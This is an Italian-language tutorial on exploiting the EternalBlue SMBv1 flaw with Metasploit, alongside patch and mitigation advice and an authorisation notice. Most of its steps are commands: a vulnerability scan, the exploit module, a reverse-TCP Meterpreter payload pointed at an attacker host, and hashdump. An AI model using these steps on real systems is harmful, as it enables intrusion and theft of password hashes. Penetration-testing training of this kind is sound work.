Tutorials
Msfconsole
Guida Approfondita allo Sfruttamento di EternalBlue MS17-010 ---
#exploitation#windows#smb#metasploit
Guida Approfondita allo Sfruttamento di EternalBlue (MS17-010)
📄 Descrizione della Vulnerabilità
EternalBlue è una vulnerabilità critica nel protocollo SMBv1 di Windows (CVE-2017-0144), sfruttabile per eseguire Remote Code Execution (RCE). Scoperta dalla NSA e resa pubblica dal gruppo Shadow Brokers nel 2017, è stata ampiamente utilizzata da malware come WannaCry e NotPetya.
🛡️ Sistemi Vulnerabili
- Windows XP
- Windows 7
- Windows Server 2003/2008/2012
- Windows 10 (versioni precedenti alla patch del marzo 2017)
🔧 Fasi di Exploitation con Metasploit
1. Avvio di Metasploit
bash
msfconsole2. Ricerca del modulo EternalBlue
bash
search eternalblue3. Verifica della vulnerabilità
bash
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS <IP_TARGET>
runSe il target è vulnerabile, il modulo lo segnalerà.
4. Caricamento dell'exploit
bash
use exploit/windows/smb/ms17_010_eternalblue5. Configurazione dell'exploit
bash
set RHOST <IP_TARGET>
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST <IP_ATTACKER>
set LPORT 44446. Esecuzione dell'exploit
bash
exploitSe il tutto va a buon fine, si otterrà una sessione meterpreter attiva.
🔐 Post-Exploitation (con Meterpreter)
Una volta ottenuta la shell remota:
bash
sysinfo # Info sul sistema
getuid # Utente corrente
hashdump # Dump password hash
shell # Accesso alla shell di sistema⚡ Indicatori di Compromissione (IOC)
- Porte SMB (445) aperte
- Nessuna patch applicata (MS17-010)
- Sistemi legacy in uso
🪧 Patch e Mitigazioni
- Applicare la patch MS17-010 rilasciata da Microsoft.
- Disabilitare SMBv1 (fortemente consigliato).
powershell
Set-SmbServerConfiguration -EnableSMB1Protocol $false- Utilizzare firewall per bloccare connessioni SMB in entrata da IP esterni.
🚫 Note Etiche
L'utilizzo di EternalBlue, come ogni exploit, deve essere autorizzato. Usarlo senza consenso è illegale e può avere gravi conseguenze legali.
📊 Riepilogo Tecnico
| Modulo Metasploit | Descrizione |
| auxiliary/scanner/smb/smb_ms17_010 | Verifica vulnerabilità |
| exploit/windows/smb/ms17_010_eternalblue | Exploit per RCE |
🚀 Suggerimenti Finali
- Testare l'exploit in ambienti di laboratorio (es. HackTheBox, VulnHub)
- Documentare sempre le evidenze raccolte post-exploit
- Valutare l'uso di
ms17_010_psexecper scenari alternativi
Fonti: